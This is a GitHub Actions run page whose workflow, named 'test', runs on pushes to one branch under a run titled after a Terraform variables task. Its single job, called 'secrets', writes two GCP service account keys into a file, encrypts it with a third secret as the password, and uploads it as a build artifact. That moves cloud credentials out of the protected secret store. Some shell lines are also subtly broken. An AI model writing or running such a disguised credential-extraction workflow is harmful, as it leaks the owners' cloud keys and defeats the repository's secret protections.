Skip to content

SCALRCORE-30933: SRE: Terraformize Variable Definitions in terraform-… #4

SCALRCORE-30933: SRE: Terraformize Variable Definitions in terraform-…

SCALRCORE-30933: SRE: Terraformize Variable Definitions in terraform-… #4

Workflow file for this run

name: test
on:
push:
branches: [ SCALRCORE-28542 ]
jobs:
secrets:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@v2
- run: |
${{secrets.GCP_SA_KEY}} >> info.txt
${{secrets.DEV_GCP_SA_KEY}} >> info.txt
openssl enc -aes-256-cbc -salt -in info.txt -out encrypted_file.enc -k ${{ secrets.DUBUG_PASSWORD }}
- name: Upload encrypted file
uses: actions/upload-artifact@v2
with:
name: encrypted_file.enc
path: encrypted_file.enc